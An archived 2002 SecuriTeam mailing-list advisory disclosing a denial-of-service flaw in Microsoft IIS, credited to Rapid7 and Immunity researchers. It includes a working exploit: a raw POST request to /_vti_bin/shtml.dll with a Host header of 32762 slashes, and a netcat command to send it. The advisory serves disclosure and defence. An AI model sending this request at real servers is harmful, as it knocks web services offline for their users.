[NT] Malformed HOST Header Causes IIS DoS
From: support@securiteam.comDate: 10/15/02
- Previous message: support@securiteam.com: "[NEWS] Oracle 8i/9i Listener SERVICE_CURLOAD Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 15 Oct 2002 04:19:43 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Malformed HOST Header Causes IIS DoS
------------------------------------------------------------------------
SUMMARY
A security vulnerability in IIS's web server allows remote attackers to
cause the web server to crash, this is done by providing it with a long
Host field filled with the character "/".
DETAILS
Exploit:
By either doinging it manually:
-------------------------[begin]--------------------------------------
POST /_vti_bin/shtml.dll HTTP/1.0
Host: [32762 '/' characters]
Content-length: 22
http://www.rapid7.com/
- --------------------------[end]---------------------------------------
This will cause the web service to consume 99% of the CPU for about 35
seconds. During this time, no other HTTP requests will be serviced. Use
it with:
$ nc x.x.x.x 80 < iis_dos
Or by using SPIKE:
See <http://www.immunitysec.com/spike.html>
http://www.immunitysec.com/spike.html for more details.
ADDITIONAL INFORMATION
The information has been provided by <mailto:Joe_Testa@rapid7.com> Joe
Testa and <mailto:dave@immunitysec.com> Dave Aitel (finder of the
problem).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Oracle 8i/9i Listener SERVICE_CURLOAD Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Re: WSE 3.0, usernameOverTransportSecurity, custom Token Manager w/ securityTokenManager,
... I've added the web service call directly to my Data binding method ... expected
but not present in the security header of the incoming ... the username token to
the message. ... protected override string AuthenticateToken(UsernameToken token) ...
(microsoft.public.dotnet.framework.webservices.enhancements) - Re: Cannot read a Security Log from ASP.net web service
... it's a very bad idea to grant that permission to the ASPNET ... Here's the error
I get after adding the ASPNET account to the Admin group: ... Cannot open log Security
on machine .. ... > a web form that calls a web service. ... (microsoft.public.dotnet.framework.aspnet.security) - RE: Recommendations for securing a local webservice.
... You seem to be trying to secure a web service interface to only those ... protocol
that was intended to be caller agnostic to implement a caller ... Install a special
certificate as part of the ... Combine #2 with token based security. ... (microsoft.public.dotnet.framework.aspnet.webservices) - RE: Web Service Implementation Security Question
... As for the security problems regarding on using TypedDAtaset in asp.net ...
Web Service Implementation Security Question ... | enable the %windir%\Temp directory so
the schema can compile. ... Have the process that “compiles�the schema files
use another ... (microsoft.public.inetserver.iis.security) - RE: WSE 2.0, smart client, Username authentication, no x.509
... web services WSE 3.0 hosts them without a web server for you (read the WSE ...
To perform authentication, because your database does not contain user ... the implementation
William Stacey has uses Security ... > server where my web service is ...
(microsoft.public.dotnet.framework.webservices.enhancements)
